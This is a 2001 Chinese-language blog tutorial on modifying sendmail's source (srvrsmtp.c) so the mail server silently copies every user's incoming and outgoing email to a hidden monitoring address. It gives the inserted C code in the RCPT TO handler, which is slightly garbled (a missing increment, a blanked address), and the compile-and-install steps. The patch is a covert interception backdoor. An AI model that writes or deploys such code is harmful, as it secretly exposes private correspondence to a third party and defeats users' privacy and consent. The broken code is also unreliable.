豆豆经验:监控你E-mail用户的邮件 - 豆豆技术点金 - 扁豆老哥魏威

(这条文章已经被阅读了 225 次) 时间:2001-10-25 17:27:30 来源:扁豆老哥魏威 (扁豆老哥) 原创-IT

一、简介

如果你的邮件系统是用sendmail,不论你是用它来发送、接收邮件还是仅仅将其作为一台Mail Relay Host,你都可以通过简单的修改一下sendmail源代码来捕获用户的邮件。

二、环境

FreeBSD 4.3 Release sendmail 8.11.5,从www.sendmail.org下载源代码包sendmail-8.11.5.tar.gz,运行:

# tar zxvf sendmail-8.11.5.tar.gz

在当前目录下生成sendmail-8.11.5目录

三、步骤

先让我们来看一个SMTP通信的例子:(参考:rfc821.txt)

This SMTP example shows mail sent by Smith at host Alpha.ARPA,

to Jones, Green, and Brown at host Beta.ARPA. Here we assume

that host Alpha contacts host Beta directly.

S: MAIL FROM:

R: 250 OK

S: RCPT TO:

R: 250 OK

S: RCPT TO:

R: 550 No such user here

S: RCPT TO:

R: 250 OK

S: DATA

R: 354 Start mail input; end with .

S: Blah blah blah…

S: …etc. etc. etc.

S: .

R: 250 OK

虽然在一个SMTP过程中可能还有很多其他命令的交互,但核心的就这么三步:MAIL FROM、RCPT TO、DATA。在./sendmail-8.11.5/sendmail下有一个文件srvrsmtp.c,有一个大函数smtp(),它里面的switch循环就是专门处理SMTP通信,即上面例子中R响应。任何一个SMTP 过来的邮件 —— 不论是来自outlook express这样的邮件客户端软件,还是Internet上的一台MAIL HOST,smtp()依次处理对方发送过来的MAIL FROM、RCPT TO、DATA命令,从中获得send、recipient list、message,统统存入一个struct ENVELOPE变量中,最后调用sendall()再将邮件转给recipient list。因此,我们只需要在smtp()处理RCPT TO时将我们的监控E-mail Address加进去就可以了。

1、首先在smtp()变量声明处加入一个变量:

int spydone = 0;

2、打开srvrsmtp.c,搜索关键字:case CMDRCPT,从这行开始往下的201行是处理recipient list代码。在该case段的最后一行 ,即break;前,我们插入如下代码:

if(!spydone)

{

a = parseaddr(”, NULLADDR, RF_COPYALL, ’ ’, &delimptr, e); /* 将[email protected]换成监控e-mail */

a = recipient(a, &e->e_sendqueue, 0, e);

e->e_to = a->q_paddr;

nrcpts ;

spydone = 1;

}

保存退出,在./sendmail-8.11.5下运行:make; make install 编译、安装。经过修改的sendmail,对于用户接收发送的邮件,都会发送一份到[email protected]里。